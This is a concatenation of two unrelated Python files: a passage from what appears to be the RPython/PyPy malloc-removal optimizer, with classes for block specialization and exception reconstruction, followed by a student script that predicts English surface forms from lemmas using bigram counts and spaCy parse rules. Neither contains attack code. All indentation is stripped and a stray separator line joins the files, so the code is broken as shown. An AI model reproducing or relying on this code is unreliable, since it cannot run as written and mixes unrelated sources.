# by seeing the exc_type as a constant
pass
elif isinstance(exc_value_node, VirtualSpecNode):
# can improve with a strange hack: we pretend that
# the source code jumps to a block that itself allocates
# the exception, sets all fields, and raises it by
# passing a constant type.
typedesc = exc_value_node.typedesc
return self.get_exc_reconstruction_block(typedesc)
else:
# cannot improve: handle_catch() will have no clue about
# the exception type
pass
raise CannotVirtualize("except block")
targetblock = self.graph.exceptblock
self.mallocv.fixup_except_block(targetblock)
return targetblock
def get_exc_reconstruction_block(self, typedesc):
exceptblock = self.graph.exceptblock
self.mallocv.fixup_except_block(exceptblock)
TEXC = exceptblock.inputargs[0].concretetype
TVAL = exceptblock.inputargs[1].concretetype
#
v_ignored_type = varoftype(TEXC)
v_incoming_value = varoftype(TVAL)
block = Block([v_ignored_type, v_incoming_value])
#
c_EXCTYPE = Constant(typedesc.MALLOCTYPE, lltype.Void)
v = varoftype(lltype.Ptr(typedesc.MALLOCTYPE))
c_flavor = Constant({'flavor': 'gc'}, lltype.Void)
op = SpaceOperation('malloc', [c_EXCTYPE, c_flavor], v)
block.operations.append(op)
#
for name, FIELDTYPE in typedesc.names_and_types:
EXACTPTR = lltype.Ptr(typedesc.name2subtype[name])
c_name = Constant(name)
c_name.concretetype = lltype.Void
#
v_in = varoftype(EXACTPTR)
op = SpaceOperation('cast_pointer', [v_incoming_value], v_in)
block.operations.append(op)
#
v_field = varoftype(FIELDTYPE)
op = SpaceOperation('getfield', [v_in, c_name], v_field)
block.operations.append(op)
#
v_out = varoftype(EXACTPTR)
op = SpaceOperation('cast_pointer', [v], v_out)
block.operations.append(op)
#
v0 = varoftype(lltype.Void)
op = SpaceOperation('setfield', [v_out, c_name, v_field], v0)
block.operations.append(op)
#
v_exc_value = varoftype(TVAL)
op = SpaceOperation('cast_pointer', [v], v_exc_value)
block.operations.append(op)
#
exc_type = self.mallocv.EXCTYPE_to_vtable[typedesc.MALLOCTYPE]
c_exc_type = Constant(exc_type, TEXC)
block.closeblock(Link([c_exc_type, v_exc_value], exceptblock))
return block
def get_specialized_block(self, virtualframe, v_expand_malloc=None):
key = virtualframe.getfrozenkey()
specblock = self.specialized_blocks.get(key)
if specblock is None:
orgblock = virtualframe.sourceblock
assert len(orgblock.exits) != 0
spec = BlockSpecializer(self, v_expand_malloc)
spec.initialize_renamings(virtualframe)
self.pending_specializations.append(spec)
specblock = spec.specblock
self.specialized_blocks[key] = specblock
return specblock
def propagate_specializations(self):
while self.pending_specializations:
spec = self.pending_specializations.pop()
spec.specialize_operations()
spec.follow_exits()
class BlockSpecializer(object):
def __init__(self, graphbuilder, v_expand_malloc=None):
self.graphbuilder = graphbuilder
self.v_expand_malloc = v_expand_malloc
self.specblock = Block([])
def initialize_renamings(self, virtualframe, keep_inputargs=False):
# we make a copy of the original 'virtualframe' because the
# specialize_operations() will mutate some of its content.
virtualframe = virtualframe.copy({})
self.virtualframe = virtualframe
self.nodes = virtualframe.get_nodes_in_use()
self.renamings = {} # {RuntimeSpecNode(): Variable()}
if keep_inputargs:
assert virtualframe.varlist == virtualframe.sourceblock.inputargs
specinputargs = []
for i, rtnode in enumerate(virtualframe.find_rt_nodes()):
if keep_inputargs:
v = virtualframe.varlist[i]
assert v.concretetype == rtnode.TYPE
else:
v = rtnode.newvar()
self.renamings[rtnode] = v
specinputargs.append(v)
self.specblock.inputargs = specinputargs
def setnode(self, v, node):
assert v not in self.nodes
self.nodes[v] = node
def getnode(self, v):
if isinstance(v, Variable):
return self.nodes[v]
else:
return getconstnode(v, self.renamings)
def rename_nonvirtual(self, v, where=None):
if not isinstance(v, Variable):
return v
node = self.nodes[v]
if not isinstance(node, RuntimeSpecNode):
raise CannotVirtualize(where)
return self.renamings[node]
def expand_nodes(self, nodelist):
rtnodes, vtnodes = find_all_nodes(nodelist)
return [self.renamings[rtnode] for rtnode in rtnodes]
def specialize_operations(self):
newoperations = []
self.ops_produced_by_last_op = 0
# note that 'self.virtualframe' can be changed during the loop!
while True:
operations = self.virtualframe.sourceblock.operations
try:
op = operations[self.virtualframe.nextopindex]
self.virtualframe.nextopindex += 1
except IndexError:
break
meth = getattr(self, 'handle_op_' + op.opname,
self.handle_default)
newops_for_this_op = meth(op)
newoperations += newops_for_this_op
self.ops_produced_by_last_op = len(newops_for_this_op)
for op in newoperations:
if op.opname == 'direct_call':
graph = graph_called_by(op)
if graph in self.virtualframe.calledgraphs:
raise CannotVirtualize("recursion in residual call")
self.specblock.operations = newoperations
def follow_exits(self):
block = self.virtualframe.sourceblock
self.specblock.exitswitch = self.rename_nonvirtual(block.exitswitch,
'exitswitch')
links = block.exits
catch_exc = self.specblock.exitswitch == c_last_exception
if not catch_exc and isinstance(self.specblock.exitswitch, Constant):
# constant-fold the switch
for link in links:
if link.exitcase == 'default':
break
if link.llexitcase == self.specblock.exitswitch.value:
break
else:
raise Exception("exit case not found?")
links = (link,)
self.specblock.exitswitch = None
if catch_exc and self.ops_produced_by_last_op == 0:
# the last op of the sourceblock did not produce any
# operation in specblock, so we need to discard the
# exception-catching.
catch_exc = False
links = links[:1]
assert links[0].exitcase is None # the non-exception-catching case
self.specblock.exitswitch = None
newlinks = []
for link in links:
is_catch_link = catch_exc and link.exitcase is not None
if is_catch_link:
extravars = []
for attr in ['last_exception', 'last_exc_value']:
v = getattr(link, attr)
if isinstance(v, Variable):
rtnode = RuntimeSpecNode(v, v.concretetype)
self.setnode(v, rtnode)
self.renamings[rtnode] = v = rtnode.newvar()
extravars.append(v)
linkargsnodes = [self.getnode(v1) for v1 in link.args]
#
newlink = self.graphbuilder.create_outgoing_link(
self.virtualframe, link.target, linkargsnodes,
self.renamings, self.v_expand_malloc)
#
if self.specblock.exitswitch is not None:
newlink.exitcase = link.exitcase
if hasattr(link, 'llexitcase'):
newlink.llexitcase = link.llexitcase
if is_catch_link:
newlink.extravars(*extravars)
newlinks.append(newlink)
self.specblock.closeblock(*newlinks)
def make_rt_result(self, v_result):
newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
self.setnode(v_result, newrtnode)
v_new = newrtnode.newvar()
self.renamings[newrtnode] = v_new
return v_new
def make_const_rt_result(self, v_result, value):
newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
self.setnode(v_result, newrtnode)
if v_result.concretetype is not lltype.Void:
assert v_result.concretetype == lltype.typeOf(value)
c_value = Constant(value)
c_value.concretetype = v_result.concretetype
self.renamings[newrtnode] = c_value
def handle_default(self, op):
newargs = [self.rename_nonvirtual(v, op) for v in op.args]
constresult = try_fold_operation(op.opname, newargs,
op.result.concretetype)
if constresult:
self.make_const_rt_result(op.result, constresult[0])
return []
else:
newresult = self.make_rt_result(op.result)
return [SpaceOperation(op.opname, newargs, newresult)]
def handle_unreachable(self, op):
from rpython.rtyper.lltypesystem.rstr import string_repr
msg = 'unreachable: %s' % (op,)
ll_msg = string_repr.convert_const(msg)
c_msg = Constant(ll_msg, lltype.typeOf(ll_msg))
newresult = self.make_rt_result(op.result)
return [SpaceOperation('debug_fatalerror', [c_msg], newresult)]
def handle_op_getfield(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
fieldname = op.args[1].value
index = node.typedesc.name2index[fieldname]
self.setnode(op.result, node.fields[index])
return []
else:
return self.handle_default(op)
def handle_op_setfield(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
if node.readonly:
raise ForcedInline(op)
fieldname = op.args[1].value
index = node.typedesc.name2index[fieldname]
node.fields[index] = self.getnode(op.args[2])
return []
else:
return self.handle_default(op)
def handle_op_same_as(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
node = self.getnode(op.args[0])
self.setnode(op.result, node)
return []
else:
return self.handle_default(op)
def handle_op_cast_pointer(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
node = self.getnode(op.args[0])
SOURCEPTR = lltype.Ptr(node.typedesc.MALLOCTYPE)
TARGETPTR = op.result.concretetype
try:
if lltype.castable(TARGETPTR, SOURCEPTR) < 0:
raise lltype.InvalidCast
except lltype.InvalidCast:
return self.handle_unreachable(op)
self.setnode(op.result, node)
return []
else:
return self.handle_default(op)
def handle_op_ptr_nonzero(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
self.make_const_rt_result(op.result, True)
return []
else:
return self.handle_default(op)
def handle_op_ptr_iszero(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
self.make_const_rt_result(op.result, False)
return []
else:
return self.handle_default(op)
def handle_op_ptr_eq(self, op):
node0 = self.getnode(op.args[0])
node1 = self.getnode(op.args[1])
if (isinstance(node0, VirtualSpecNode) or
isinstance(node1, VirtualSpecNode)):
self.make_const_rt_result(op.result, node0 is node1)
return []
else:
return self.handle_default(op)
def handle_op_ptr_ne(self, op):
node0 = self.getnode(op.args[0])
node1 = self.getnode(op.args[1])
if (isinstance(node0, VirtualSpecNode) or
isinstance(node1, VirtualSpecNode)):
self.make_const_rt_result(op.result, node0 is not node1)
return []
else:
return self.handle_default(op)
def handle_op_malloc(self, op):
if op.result is self.v_expand_malloc:
MALLOCTYPE = op.result.concretetype.TO
typedesc = self.graphbuilder.mallocv.getmalloctypedesc(MALLOCTYPE)
virtualnode = VirtualSpecNode(typedesc, [])
self.setnode(op.result, virtualnode)
for name, FIELDTYPE in typedesc.names_and_types:
fieldnode = RuntimeSpecNode(name, FIELDTYPE)
virtualnode.fields.append(fieldnode)
c = Constant(FIELDTYPE._defl())
c.concretetype = FIELDTYPE
self.renamings[fieldnode] = c
self.v_expand_malloc = None # done
return []
else:
return self.handle_default(op)
def handle_op_direct_call(self, op):
graph = graph_called_by(op)
if graph is None:
return self.handle_default(op)
nb_args = len(op.args) - 1
assert nb_args == len(graph.getargs())
newnodes = [self.getnode(v) for v in op.args[1:]]
myframe = self.get_updated_frame(op)
mallocv = self.graphbuilder.mallocv
if op.result is self.v_expand_malloc:
# move to inlining the callee, and continue looking for the
# malloc to expand in the callee's graph
op_to_remove = mallocv.inline_and_remove[graph]
self.v_expand_malloc = op_to_remove.result
return self.handle_inlined_call(myframe, graph, newnodes)
argnodes = copynodes(newnodes, flagreadonly=myframe.find_vt_nodes())
kind, newgraph = mallocv.get_specialized_graph(graph, argnodes)
if kind == 'trivial':
return self.handle_default(op)
elif kind == 'inline':
return self.handle_inlined_call(myframe, graph, newnodes)
elif kind == 'call':
return self.handle_residual_call(op, newgraph, newnodes)
elif kind == 'fail':
raise CannotVirtualize(op)
else:
raise ValueError(kind)
def get_updated_frame(self, op):
sourceblock = self.virtualframe.sourceblock
nextopindex = self.virtualframe.nextopindex
self.nodes[op.result] = FutureReturnValue(op)
myframe = VirtualFrame(sourceblock, nextopindex, self.nodes,
self.virtualframe.callerframe,
self.virtualframe.calledgraphs)
del self.nodes[op.result]
return myframe
def handle_residual_call(self, op, newgraph, newnodes):
fspecptr = getfunctionptr(newgraph)
newargs = [Constant(fspecptr,
concretetype=lltype.typeOf(fspecptr))]
newargs += self.expand_nodes(newnodes)
newresult = self.make_rt_result(op.result)
newop = SpaceOperation('direct_call', newargs, newresult)
return [newop]
def handle_inlined_call(self, myframe, graph, newnodes):
assert len(graph.getargs()) == len(newnodes)
targetnodes = dict(zip(graph.getargs(), newnodes))
calledgraphs = myframe.calledgraphs.copy()
if graph in calledgraphs:
raise CannotVirtualize("recursion during inlining")
calledgraphs[graph] = True
calleeframe = VirtualFrame(graph.startblock, 0,
targetnodes, myframe, calledgraphs)
self.virtualframe = calleeframe
self.nodes = calleeframe.get_nodes_in_use()
return []
def handle_op_indirect_call(self, op):
v_func = self.rename_nonvirtual(op.args[0], op)
if isinstance(v_func, Constant):
op = SpaceOperation('direct_call', [v_func] + op.args[1:-1],
op.result)
return self.handle_op_direct_call(op)
else:
return self.handle_default(op)
class FutureReturnValue(object):
def __init__(self, op):
self.op = op # for debugging
def getfrozenkey(self, memo):
return None
def accumulate_nodes(self, rtnodes, vtnodes):
pass
def copy(self, memo, flagreadonly):
return self
# ____________________________________________________________
# helpers
def vars_alive_through_op(block, index):
# NB. make sure this always returns the variables in the same order
if len(block.exits) == 0:
return block.inputargs # return or except block
result = []
seen = {}
def see(v):
if isinstance(v, Variable) and v not in seen:
result.append(v)
seen[v] = True
# don't include the variables produced by the current or future operations
for op in block.operations[index:]:
seen[op.result] = True
# don't include the extra vars produced by exception-catching links
for link in block.exits:
for v in link.getextravars():
seen[v] = True
# but include the variables consumed by the current or any future operation
for op in block.operations[index:]:
for v in op.args:
see(v)
see(block.exitswitch)
for link in block.exits:
for v in link.args:
see(v)
return result
def is_return(block):
return len(block.exits) == 0 and len(block.inputargs) == 1
def is_except(block):
return len(block.exits) == 0 and len(block.inputargs) == 2
class CannotConstFold(Exception):
pass
def try_fold_operation(opname, args_v, RESTYPE):
args = []
for c in args_v:
if not isinstance(c, Constant):
return
args.append(c.value)
try:
op = getattr(llop, opname)
except AttributeError:
return
if not op.is_pure(args_v):
return
try:
result = op(RESTYPE, *args)
except TypeError:
pass
except (KeyboardInterrupt, SystemExit):
raise
except Exception, e:
pass
#log.WARNING('constant-folding %s%r:' % (opname, args_v))
#log.WARNING(' %s: %s' % (e.__class__.__name__, e))
else:
return (result,)
def getconstnode(v, renamings):
rtnode = RuntimeSpecNode(None, v.concretetype)
renamings[rtnode] = v
return rtnode
def graph_called_by(op):
assert op.opname == 'direct_call'
fobj = op.args[0].value._obj
graph = getattr(fobj, 'graph', None)
return graph
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# # # #
# model-bi-gramms.py
# @author Zhibin.LU
# @created Fri Feb 23 2018 17:14:32 GMT-0500 (EST)
# @last-modified Wed Mar 14 2018 19:11:45 GMT-0400 (EDT)
# @website: https://louis-udm.github.io
# # # #
import gzip
import time
from collections import Counter
import regex as re
import spacy
import textacy
import loader
def load_data(folder):
"""
Load text in a string.
"""
file_paths = loader.list_files(folder)
input_words = []
target_words = []
for file_path in file_paths:
with gzip.open(file_path, 'rt', encoding='ISO-8859-1') as f:
lines = f.read().split('\n')
for line in lines:
if line.startswith('#begin') or line.startswith('#end'):
continue
line = line.encode("ascii", errors="ignore").decode()
split_result = line.split('\t')
if len(split_result) == 2:
target_word, input_word = split_result
input_word = input_word.lower().strip()
target_word = target_word.lower().strip()
pattern = re.compile(r'\'')
input_word = re.sub(pattern, '', input_word)
target_word = re.sub(pattern, '', target_word)
input_word = re.sub("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])", r" \1 ", input_word)
target_word = re.sub("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])", r" \1 ", target_word)
pattern = re.compile(r'\d+s')
m1 = re.search(pattern, input_word)
m2 = re.search(pattern, target_word)
if m2 is not None and m1 is None:
input_word = re.sub('(\d+)', r"\1s", input_word)
input_word = re.sub('(\d+)', r" \1 ", input_word)
target_word = re.sub('(\d+)', r" \1 ", target_word)
input_word = re.sub(' +', ' ', input_word)
target_word = re.sub(' +', ' ', target_word)
if input_word == '':
continue
input_words.append(input_word)
target_words.append(target_word)
return ' '.join(input_words), ' '.join(target_words)
print("{} Loading data...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
train_lemm_corpus, train_surf_corpus = load_data('data/train')
test_lemm_corpus, test_surf_corpus = load_data('data/test')
train_lemm_corpus = re.sub(' +', ' ', train_lemm_corpus)
train_surf_corpus = re.sub(' +', ' ', train_surf_corpus)
test_lemm_corpus = re.sub(' +', ' ', test_lemm_corpus)
test_surf_corpus = re.sub(' +', ' ', test_surf_corpus)
# %%
'''
Get 2-gramms model, all types, all sentences of train_lemme set.
Get 2-gramms model, all types, all sentences of train_surface set.
Get all types, all sentences of test_lemme set.
Get all types, all sentences of test_surface set.
'''
print("{} Training model...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
start_time = time.time()
nlp = spacy.load('en', disable=['parser', 'tagger'])
train_lemm_tacy_doc = nlp(train_lemm_corpus)
train_surf_tacy_doc = nlp(train_surf_corpus)
test_lemm_tacy_doc = nlp(test_lemm_corpus)
test_surf_tacy_doc = nlp(test_surf_corpus)
print('Tokens of train_lemm_tacy_doc: ', len(train_lemm_tacy_doc))
print('Tokens of train_surf_tacy_doc: ', len(train_surf_tacy_doc))
if len(train_lemm_tacy_doc) != len(train_surf_tacy_doc):
print('Warning: the numbre of tokens of lemme and surfaceis in train not equal !!!!!!')
print('Tokens of test_lemm_tacy_doc: ', len(test_lemm_tacy_doc))
print('Tokens of test_surf_tacy_doc: ', len(test_surf_tacy_doc))
if len(test_lemm_tacy_doc) != len(test_surf_tacy_doc):
print('Warning: the numbre of tokens of lemme and surfaceis on test not equal !!!!!!')
# %%
train_surf_tacy_sents = []
start_ind = 0
for token in train_surf_tacy_doc:
if token.text in ['.', '?', '!']:
train_surf_tacy_sents.append(train_surf_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of train surf:', len(train_surf_tacy_sents))
train_lemm_tacy_sents = []
start_ind = 0
for token in train_lemm_tacy_doc:
if token.text in ['.', '?', '!']:
train_lemm_tacy_sents.append(train_lemm_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of train lemm:', len(train_lemm_tacy_sents))
if len(train_surf_tacy_sents) != len(train_lemm_tacy_sents):
print('Warning: the numbre of sentances of lemme and surface is not equal !!!!!!')
test_surf_tacy_sents = []
start_ind = 0
for token in test_surf_tacy_doc:
if token.text in ['.', '?', '!']:
test_surf_tacy_sents.append(test_surf_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of test surf:', len(test_surf_tacy_sents))
test_lemm_tacy_sents = []
start_ind = 0
for token in test_lemm_tacy_doc:
if token.text in ['.', '?', '!']:
test_lemm_tacy_sents.append(test_lemm_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of test lemm:', len(test_lemm_tacy_sents))
if len(test_surf_tacy_sents) != len(test_lemm_tacy_sents):
print('Warning: the numbre of sentances of lemme and surface on test is not equal !!!!!!')
# %%
train_lemm_tacy_doc = textacy.Doc(train_lemm_tacy_doc)
train_surf_tacy_doc = textacy.Doc(train_surf_tacy_doc)
train_lemm_2grams_bag = train_lemm_tacy_doc.to_bag_of_terms(ngrams=2, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train lemm 2grams bag:', len(train_lemm_2grams_bag))
train_lemm_1grams_bag = train_lemm_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train lemm 1grams bag:', len(train_lemm_1grams_bag))
train_surf_2grams_bag = train_surf_tacy_doc.to_bag_of_terms(ngrams=2, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train surf 2grams bag:', len(train_surf_2grams_bag))
train_surf_1grams_bag = train_surf_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train surf 1grams bag:', len(train_surf_1grams_bag))
test_lemm_tacy_doc = textacy.Doc(test_lemm_tacy_doc)
test_surf_tacy_doc = textacy.Doc(test_surf_tacy_doc)
test_lemm_1grams_bag = test_lemm_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False, drop_determiners=False)
print('size of test lemm 1grams bag:', len(test_lemm_1grams_bag))
test_surf_1grams_bag = test_surf_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False, drop_determiners=False)
print('size of test surf 1grams bag:', len(test_surf_1grams_bag))
# %%
# test code
print(type(train_lemm_2grams_bag), len(train_lemm_2grams_bag))
print(type(train_lemm_1grams_bag), len(train_lemm_2grams_bag))
print('him . ', train_lemm_2grams_bag['him .'])
print('. the', train_lemm_2grams_bag['. the'])
i = 0
for sent in train_lemm_tacy_sents:
print(sent.text)
i += 1
if i > 10: break
# test code
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_surf_tacy_doc.tokens)):
# # if chs[0].text=='have' and chs[1].text=="'":
# # print(i,chs[0],chs[1])
# # break
# if chs[0].text not in ['be','find','get','have','a','he','lie','use','leave','go','see','she','we','i','would'] and chs[0].text[0]!=chs[1].text[0]:
# print(i,chs[0],chs[1])
# break
# # if i>=740 and i<=750:
# # print(i,chs[0],chs[1])
#
# # print(train_lemm_corpus[0:200])
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_lemm_corpus.split(' '))):
# if chs[0].text!=chs[1]:
# print(i,'|'+chs[0].text+'|','|'+chs[1]+'|')
# # break
# if i>345:
# break
# %%
'''
Get all pair of surf-lemma and their count on train data set.
'''
pairs_list = []
for lemma, surf in zip(train_lemm_tacy_doc, train_surf_tacy_doc):
pairs_list.append(surf.text.strip() + ' ' + lemma.text.strip())
train_surf_lemm_map = {}
for i, pair in enumerate(pairs_list):
if pair not in train_surf_lemm_map:
train_surf_lemm_map[pair] = pairs_list.count(pair)
# test code
print('are be ', train_surf_lemm_map['are be'])
# print('( ( ',train_surf_lemm_map['( ('])
# print('. . ',train_surf_lemm_map['. .'])
# %%
# test code
# print('(rimatara reed) ',train_lemm_2grams_bag['rimatara reed'])
print('(you be) ', train_lemm_2grams_bag['you be'])
print('(he go) ', train_lemm_2grams_bag['he go'])
print('p(be|you)=', train_lemm_2grams_bag['you be'] / train_lemm_1grams_bag['you'])
print('p(cat|a)=', train_lemm_2grams_bag['a cat'] / train_lemm_1grams_bag['a'])
print('p(am|i)=', train_surf_2grams_bag['i am'] / train_surf_1grams_bag['i'])
print('p(be-o|are-s)=', train_surf_lemm_map['are be'] / train_surf_1grams_bag['are'])
print('p(.-o|.-s)=', train_surf_lemm_map['. .'] / train_surf_1grams_bag['.'])
# print('p(the|bos)=',train_surf_2grams_bag['. the'])
# %%
'''
Functions of Evalutate the prediction
'''
def count_accuracy_raw(pred_corpus, target_corpus):
"""
Test accuracy, Raw accuracy
"""
count_accu = 0
total = 0
pred_sents = pred_corpus.split('.')
target_sents = target_corpus.split('.')
for pred_sent, target_sent in zip(pred_sents, target_sents):
pred_list = pred_sent.split(' ')
targ_list = target_sent.split(' ')
for pred_token, target_token in zip(pred_list, targ_list):
total += 1
if pred_token == target_token:
count_accu += 1
return count_accu, total
raw_acc_count, raw_count_total = count_accuracy_raw(train_lemm_corpus, train_surf_corpus)
print('test of Accuracy raw:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
def count_accuracy_spacy_raw(pred_sents, target_sents):
"""
Test accuracy, accuracy of spacy's token
"""
count_accu = 0
total = 0
for pred_sent, target_sent in zip(pred_sents, target_sents):
total += 1
for pred_token, target_token in zip(pred_sent, target_sent):
total += 1
if pred_token.text == target_token.text:
count_accu += 1
return count_accu, total
spacy_acc_count, spacy_count_total = count_accuracy_spacy_raw(train_lemm_tacy_sents, train_surf_tacy_sents)
print('test of Accuracy spacy:', spacy_acc_count, '/', spacy_count_total, '=', spacy_acc_count / spacy_count_total)
# this function is for when we want stop it before all sentences.
# if not, utilse metric.accuracy instead
def count_accuracy(pred_sents, target_sents):
count_accu = 0
total = 0
for pred_sent, target_sent in zip(pred_sents, target_sents):
pred_list = re.split(r"-| |\?", pred_sent)
# pred_list=pred_sent.split(' ')
for pred_token, target_token in zip(pred_list, target_sent):
total += 1
if pred_token == target_token.text:
count_accu += 1
return count_accu, total
def decode_sents(vectors, type_list):
sents = []
for v in vectors:
sent = ' '.join(map(lambda x: type_list[x], v))
# print (sent)
sents.append(sent)
return sents
def decode_sent(vector, type_list):
return ' '.join(map(lambda x: type_list[x], vector))
# %%
'''
**** Model Bi-gramms predicteur ****
'''
'''
Get all [lemm(t-1),lemm(t)] -> surf(t)
and get map of bi-gramms [lemm(t-1),lemm(t)] -> surf word ,
in which the surface word is max count of the same pair of [lemm(t-1),lemm(t)].
for example: if there have {[you be]->are} 3 times, and {[you be]->is} 1 times,
then map([you be])=are.
'''
bigramms_lemm_surf_map = {}
bigramms_lemm_surf_count_map = {}
for lemm_sent, surf_sent in zip(train_lemm_tacy_sents, train_surf_tacy_sents):
for i, token in enumerate(zip(lemm_sent, surf_sent)):
if i == 0:
if token[0].text in bigramms_lemm_surf_count_map:
l1 = bigramms_lemm_surf_count_map[token[0].text]
l1.append(token[1].text)
else:
bigramms_lemm_surf_count_map[token[0].text] = [token[1].text]
lemm_pre = token[0].text
else:
if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_count_map:
l1 = bigramms_lemm_surf_count_map[lemm_pre + ' ' + token[0].text]
l1.append(token[1].text)
else:
bigramms_lemm_surf_count_map[lemm_pre + ' ' + token[0].text] = [token[1].text]
lemm_pre = token[0].text
for k, v in bigramms_lemm_surf_count_map.items():
word_counts = Counter(v)
bigramms_lemm_surf_map[k] = word_counts.most_common(1)[0][0]
print('size of bi-grammes: ', len(bigramms_lemm_surf_map))
# test code
print('you be -> ', bigramms_lemm_surf_map['you be'])
# %%
'''
Model Bi-gramms predicteur predict on test data
'''
print('--Model Bi-gramms predicteur predict on test data:---')
bigramms_pred_sents = []
count_accu = 0
for k, sent in enumerate(zip(test_lemm_tacy_sents, test_surf_tacy_sents)):
pred_sent = []
for i, token in enumerate(zip(sent[0], sent[1])):
if i == 0:
if token[0].text in bigramms_lemm_surf_map:
pred_token = bigramms_lemm_surf_map[token[0].text]
if pred_token == token[1].text:
count_accu += 1
pred_sent.append(pred_token)
else:
# if can't find the pair of this lemm word,use directly this lemm word
pred_sent.append(token[0].text)
# if this not paired lemm word ==the surface word correspondant.
if token[0].text == token[1].text:
count_accu += 1
lemm_pre = token[0].text
else:
if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_map:
pred_token = bigramms_lemm_surf_map[lemm_pre + ' ' + token[0].text]
if pred_token == token[1].text:
count_accu += 1
pred_sent.append(pred_token)
else:
# if can't find the pair of this lemm word,use directly this lemm word
pred_sent.append(token[0].text)
# if this not paired lemm word ==the surface word correspondant.
if token[0].text == token[1].text:
count_accu += 1
lemm_pre = token[0].text
pred_sent_text = ' '.join(pred_sent)
# pred_sent_text=pred_sent_text.rstrip()
bigramms_pred_sents.append(pred_sent_text)
if k <= 30:
print('-- NO.', k)
print(test_lemm_tacy_sents[k].text)
print(test_surf_tacy_sents[k].text)
print(pred_sent_text)
# %%
'''
Calcule accuracy of Bi-gramme model:
'''
raw_acc_count, raw_count_total = count_accuracy_raw(test_lemm_corpus, test_surf_corpus)
print('Accuracy raw on test data:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
test_surf_tacy_sents_raw = [sent.text for sent in test_surf_tacy_sents]
from metric import *
taux_accu = accuracy(test_surf_tacy_sents_raw, bigramms_pred_sents)
print('Accuracy of bi-gramms predicteur on test data:', count_accu, '/', len(test_surf_tacy_doc), '=', taux_accu)
end_time = time.time()
print('The Bi-grammes took a total of %.3f minutes to do training and prediction.' % ((end_time - start_time) / 60))
# %%
'''
# Part-of-speech tagging
'''
# alternative for parse:nlp = spacy.load('en', disable=['parser', 'tagger']),tagger = Tagger(nlp.vocab)
nlp2 = spacy.load('en')
start_time = time.time()
parse_pred_sents = []
for i, sent in enumerate(bigramms_pred_sents):
parsed_sent = nlp2(sent)
parse_pred_sent = []
rule1 = False
rule2 = False
rule3 = False
rule4 = False
rule42 = False
rule43 = False
for j, token in enumerate(parsed_sent):
if token.dep_ == 'nsubj' and token.tag_ == 'NN': # noun, singular or mass
rule1 = True
if token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl':
rule2 = True
# this rule is not so good:
# if token.pos_=='NUM':
# rule3=True
if token.dep_ == 'pobj' and token.tag_ == 'CD' and len(token.text) == 4: # 1990
rule4 = True
if rule4 and token.dep_ == 'nsubj' and token.tag_ == 'NN':
rule42 = True
rule4 = False
if rule4 and (token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl'):
rule43 = True
rule4 = False
if rule1 and token.pos_ == 'VERB':
rule1 = False
if token.text == 'be':
parse_pred_sent.append('is')
continue
if token.text == 'have':
parse_pred_sent.append('has')
continue
if token.text == token.lemma_:
parse_pred_sent.append(token.text + 's')
continue
if rule2 and token.pos_ == 'VERB':
rule2 = False
if token.text == 'be':
parse_pred_sent.append('are')
continue
if token.text == 'has':
parse_pred_sent.append('have')
continue
if rule3 and token.tag_ == 'NN':
rule3 = False
if token.text == token.lemma_:
parse_pred_sent.append(token.text + 's')
continue
if rule42 and token.pos_ == 'VERB':
rule42 = False
if token.text in ['be', 'is']:
parse_pred_sent.append('was')
continue
# this rule is not so good:
# if token.text==token.lemma_ and token.text.endswith('e'):
# parse_pred_sent.append(token.text+'d')
# # print(' '.join(parse_pred_sent))
# continue
if rule43 and token.pos_ == 'VERB':
rule43 = False
if token.text in ['be', 'are']:
parse_pred_sent.append('were')
continue
# this rule is not so good:
# if token.text==token.lemma_ and token.text.endswith('e'):
# parse_pred_sent.append(token.text+'d')
# # print(' '.join(parse_pred_sent))
# continue
parse_pred_sent.append(token.text)
parse_pred_sents.append(' '.join(parse_pred_sent))
taux_accu = accuracy(test_surf_tacy_sents_raw, parse_pred_sents)
print('Accuracy of Parse predicteur on test data:', taux_accu)
end_time = time.time()
print('The Parse took a total of %.3f minutes to do training and prediction.' % ((end_time - start_time) / 60))
# %%
# test code
# parse_pred_sent=[]
